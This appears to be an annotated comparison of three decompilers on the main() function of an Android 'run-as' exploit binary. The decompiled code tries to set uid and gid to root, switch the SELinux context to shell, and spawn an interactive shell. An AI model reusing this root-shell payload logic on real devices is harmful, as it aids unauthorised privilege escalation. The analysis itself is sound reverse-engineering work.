逆コンパイラの比較
/*
 * Ghidra decompilation of main() from the run-as exploit binary. The gist
 * compares three decompilers on the same function; this listing is the most
 * faithful of the three and is the one to read for the real control flow.
 * undefined4 / code* are Ghidra placeholder types (4-byte value of unknown
 * type, pointer to an unresolved function); the listing is not meant to
 * compile.
 *
 * Visible behaviour, in order: log and print the caller's uid; call
 * setresgid(0,0,0) and setresuid(0,0,0); dlopen libselinux, resolve getcon
 * and setcon and switch the SELinux context to "u:r:shell:s0"; finally run
 * an interactive shell through system(). Every failure is only logged --
 * all paths, including the failure paths, still reach the system() call.
 *
 * Detection note: each step writes to logcat with tag "exploit" at priority 4
 * (ANDROID_LOG_INFO) and mirrors the message to stdout, so the activity is
 * visible in the device log.
 */
undefined4 main(undefined4 uParm1,undefined4 *puParm2)
{
/* puParm2 is argv; uParm1 (argc) is never read. */
__uid_t _Var1;
int iVar2;
code *pcVar3;
int iVar4;
code *pcVar5;
undefined4 uVar6;
undefined4 local_28;
int canary;
/* Stack-protector prologue; the canary is re-checked just before return. */
canary = __stack_chk_guard;
/* uVar6 = argv[0]. The format expects a %s and a %d but only one vararg was
   recovered here; the discarded getuid() result on the next line is
   presumably the missing %d argument (the printf() below shows both). */
uVar6 = *puParm2;
getuid();
__android_log_print(4,"exploit","uid %s %d",uVar6);
uVar6 = *puParm2;
_Var1 = getuid();
printf("uid %s %d",uVar6,_Var1);
putchar(10);
/* (FILE *)usleep is a mis-resolved data reference; almost certainly
   fflush(stdout) -- TODO confirm against the binary's relocations. The same
   artefact repeats on every fflush() below. */
fflush((FILE *)usleep);
/* Try to become root: gid first, then uid, short-circuiting on the first
   failure. A failure is only logged; execution continues regardless. */
iVar2 = setresgid(0,0,0);
if ((iVar2 != 0) || (iVar2 = setresuid(0,0,0), iVar2 != 0)) {
__android_log_print(4,"exploit","setresgid/setresuid failed");
printf("setresgid/setresuid failed");
putchar(10);
fflush((FILE *)usleep);
}
/* Report the uid actually obtained. */
_Var1 = getuid();
__android_log_print(4,"exploit","uid %d",_Var1);
_Var1 = getuid();
printf("uid %d",_Var1);
putchar(10);
fflush((FILE *)usleep);
/* Load libselinux at runtime; the second argument 1 is RTLD_LAZY. The
   leading dlerror() presumably clears stale error state, since the dlsym
   lookups below use dlerror() to detect failure. */
dlerror();
iVar2 = dlopen("/system/lib/libselinux.so",1);
if (iVar2 == 0) {
__android_log_print(4,"exploit","no selinux?");
printf("no selinux?");
putchar(10);
fflush((FILE *)usleep);
}
else {
/* Resolve getcon(); calling dlerror() after dlsym() is the documented way to
   tell a failed lookup from a legitimately NULL symbol value. */
pcVar3 = (code *)dlsym(iVar2,"getcon");
iVar4 = dlerror();
if (iVar4 == 0) {
/* getcon(&local_28): local_28 receives the current context string and uVar6
   the return code. The log call again lacks the %s vararg. No freecon() call
   is visible anywhere in the function, so the string is never released. */
uVar6 = (*pcVar3)(&local_28);
__android_log_print(4,"exploit","%d %s",uVar6);
printf("%d %s",uVar6,local_28);
putchar(10);
fflush((FILE *)usleep);
pcVar5 = (code *)dlsym(iVar2,"setcon");
iVar4 = dlerror();
if (iVar4 == 0) {
/* Ask the kernel to move this process into the "shell" SELinux domain. The
   return value is discarded; the only evidence of success is the getcon()
   re-read that is logged on the following lines. */
(*pcVar5)("u:r:shell:s0");
uVar6 = (*pcVar3)(&local_28);
__android_log_print(4,"exploit","context %d %s",uVar6);
printf("context %d %s",uVar6,local_28);
putchar(10);
}
else {
/* iVar4 holds the dlerror() message string here. */
__android_log_print(4,"exploit","dlsym setcon error %s",iVar4);
printf("dlsym setcon error %s",iVar4);
putchar(10);
}
}
else {
__android_log_print(4,"exploit","dlsym error %s",iVar4);
printf("dlsym error %s",iVar4);
putchar(10);
}
fflush((FILE *)usleep);
dlclose(iVar2);
}
/* Spawn an interactive shell with whatever uid and context the calls above
   managed to obtain. Reached unconditionally, even when every step failed. */
system("/system/bin/sh -i");
/* Stack-protector epilogue. */
if (__stack_chk_guard != canary) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
// From module: ./run-as.c
// Address range: 0xc30 - 0xe24
// Line range: 27 - 71
/*
 * RetDec decompilation of the same main(). This listing is far less faithful
 * than the Ghidra one above and should be read only as a decompiler
 * comparison:
 *  - string literals were not recovered: the "exploit" tag, the format
 *    strings, the libselinux path and the "getcon"/"setcon" symbol names
 *    appear here as (char *)argc, (char *)format, dlerror(), (char *)1, ...;
 *  - the indirect calls through the dlsym'd getcon/setcon pointers are
 *    missing entirely;
 *  - stdout is rendered as raw addresses or as g9/g8/g4 + 84 offsets;
 *  - the short-circuit condition setresgid(...) || setresuid(...) was
 *    unrolled, so the whole remainder of the function appears twice
 *    (once inside the setresgid() branch, once after the setresuid() check).
 * The "// 0x..." comments are the original basic-block addresses; "// bb" is
 * RetDec's own marker. The apparent printf() calls with a non-literal format
 * are an artefact of the lost literals, not evidence of a format-string bug
 * in the binary (Ghidra shows the literals).
 */
int main(int argc, char ** argv) {
/* Stack canary load; the unresolved relocation shows up as an absolute
   negative address. Ghidra names the same object __stack_chk_guard. */
int32_t v1 = *(int32_t *)-0x15000100;
int32_t v2 = argc; // r5
getuid();
/* Presumably the "uid %s %d" log/print pair; tag and format are lost. */
int32_t format = 0;
__android_log_print(4, (char *)argc, (char *)format);
getuid();
printf((char *)format);
putchar(10);
/* Presumably fflush(stdout); the g9+84 / constant forms below are the same
   reference -- TODO confirm. */
fflush((struct _IO_FILE *)-0x1e5fffa9);
int32_t v3 = 0; // r1
int32_t v4; // bp-40
int32_t format2;
char * file_path;
int32_t format6;
int32_t format3;
char * format4;
int32_t format5;
int32_t v5;
int32_t * v6;
int32_t * v7;
/* First half of the unrolled setresgid() || setresuid() check. Everything
   from "// 0xcba" to the end of this branch is a copy of the code that
   follows the setresuid() check further down. */
if (setresgid(0, 0, 0) != 0) {
// 0xc96
format2 = argc;
__android_log_print(4, (char *)v3, (char *)format2);
printf((char *)format2);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
// branch -> 0xcba
// 0xcba
getuid();
__android_log_print(4, (char *)v3, (char *)argc);
getuid();
printf((char *)argc);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
/* Actually dlopen("/system/lib/libselinux.so", RTLD_LAZY) per the Ghidra
   listing; the path literal was lost and dlerror()'s result substituted. */
file_path = dlerror();
v6 = dlopen(file_path, RTLD_LAZY);
argc = (int32_t)v6;
if (v6 == NULL) {
// 0xd2e
__android_log_print(4, (char *)1, "no selinux?");
printf("no selinux?");
putchar(10);
fflush((struct _IO_FILE *)0x33a04064);
// branch -> 0xdfe
} else {
// 0xcfa
/* dlsym(v6, "getcon") with the name literal lost; the getcon() call through
   the returned pointer does not appear in this listing. */
dlsym(v6, (char *)1);
if (dlerror() == NULL) {
// 0xd56
format3 = v2;
__android_log_print(4, (char *)1, (char *)format3);
printf((char *)format3);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
/* Presumably dlsym(handle, "setcon"); &v4 is the getcon() out-parameter
   that RetDec attached to the wrong call. */
dlsym((int32_t *)argc, (char *)&v4);
format4 = dlerror();
if (format4 == NULL) {
// 0xdbe
__android_log_print(4, (char *)&v4, NULL);
printf((char *)(int32_t)format4);
putchar(10);
// branch -> 0xdf0
} else {
// 0xd9c
format5 = v2;
__android_log_print(4, (char *)&v4, (char *)format5);
printf((char *)format5);
putchar(10);
// branch -> 0xdf0
}
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g8 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
// 0xdfe
/* Shell spawn followed by the canary re-check; v5 - v1 is 0 on the
   equal path. The return after __stack_chk_fail() is dead code, since that
   function does not return (RetDec did not know it is noreturn). */
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xd0c
format6 = v2;
__android_log_print(4, (char *)1, (char *)format6);
printf((char *)format6);
putchar(10);
// branch -> 0xdf0
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g4 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
}
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xc8a
/* Second half of the unrolled condition; from "// 0xcba" onward this
   duplicates the branch above line for line. */
v3 = 0;
if (setresuid(0, 0, 0) != 0) {
// 0xc96
format2 = argc;
__android_log_print(4, (char *)v3, (char *)format2);
printf((char *)format2);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
// branch -> 0xcba
}
// 0xcba
getuid();
__android_log_print(4, (char *)v3, (char *)argc);
getuid();
printf((char *)argc);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
file_path = dlerror();
v6 = dlopen(file_path, RTLD_LAZY);
argc = (int32_t)v6;
if (v6 == NULL) {
// 0xd2e
__android_log_print(4, (char *)1, "no selinux?");
printf("no selinux?");
putchar(10);
fflush((struct _IO_FILE *)0x33a04064);
// branch -> 0xdfe
} else {
// 0xcfa
dlsym(v6, (char *)1);
if (dlerror() == NULL) {
// 0xd56
format3 = v2;
__android_log_print(4, (char *)1, (char *)format3);
printf((char *)format3);
putchar(10);
fflush((struct _IO_FILE *)((int32_t)g9 + 84));
dlsym((int32_t *)argc, (char *)&v4);
format4 = dlerror();
if (format4 == NULL) {
// 0xdbe
__android_log_print(4, (char *)&v4, NULL);
printf((char *)(int32_t)format4);
putchar(10);
// branch -> 0xdf0
} else {
// 0xd9c
format5 = v2;
__android_log_print(4, (char *)&v4, (char *)format5);
printf((char *)format5);
putchar(10);
// branch -> 0xdf0
}
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g8 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
// 0xd0c
format6 = v2;
__android_log_print(4, (char *)1, (char *)format6);
printf((char *)format6);
putchar(10);
// branch -> 0xdf0
// 0xdf0
fflush((struct _IO_FILE *)(*(int32_t *)(int32_t)&g4 + 84));
dlclose((int32_t *)argc);
// branch -> 0xdfe
}
// 0xdfe
system("/system/bin/sh -i");
v5 = *(int32_t *)-0x14ffffbe;
if (v5 == v1) {
// bb
return v5 - v1;
}
// 0xe1e
__stack_chk_fail();
return (int32_t)&v7;
}
/* $t */
/*
 * Third decompiler's output (the reinterpret_cast syntax suggests a tool
 * that emits C++-style casts) for the symbol "$t". "$t" is not a function:
 * in ARM ELF objects "$t" is a mapping symbol that marks where Thumb-encoded
 * instructions begin. The tool apparently treated it as a function entry and
 * disassembled the bytes with the wrong instruction set, which is why the
 * body is a sequence of conditional svc/ldm/stm fragments guarded by flag
 * variables (less1, z2, n3, ...) that are never assigned. Nothing here
 * corresponds to source code; the two main() listings above are the real
 * function.
 */
void t() {
/* All of these condition flags are read without ever being written. */
int1_t less1;
int1_t z2;
int1_t n3;
int1_t n4;
uint32_t r8_5;
int32_t r8_6;
int1_t v7;
int1_t v8;
int1_t less9;
int1_t n10;
int1_t c11;
uint32_t r6_12;
int32_t r6_13;
int32_t r6_14;
if (!less1) {
__asm__("svcge #0x3b5f0");
}
if (z2) {
fun_3b0f0();
}
if (n3) {
__asm__("ldmdami sl!, {r2, r7, ip, sp, pc} ^");
}
if (n4) {
/* "eate" is a 4-byte slice of some longer .rodata string that happened to
   be decoded as an operand; which string is not recoverable from here. */
r8_5 = reinterpret_cast<uint32_t>(r8_6 - reinterpret_cast<int32_t>("eate"));
}
if (v7) {
__asm__("stmdavs r0, {fp, sp, lr}");
}
if (v8) {
__asm__("stmdavs r5!, {r0, r1, ip, pc}");
}
__asm__("svc #0x32f7ff");
if (!less9) {
n10 = __intrinsic();
/* Rotate-right of r8_5 by r6_13 bits, negated and compared -- an artefact of
   decoding data as an ARM barrel-shifter operand. */
c11 = r6_12 < -(r8_5 >> r6_13 | r8_5 << reinterpret_cast<uint32_t>(32 - r6_14));
}
if (c11) {
}
if (n10) {
__asm__("qasxmi r4, fp, r2");
}
__asm__("svc #0x30f7ff");
}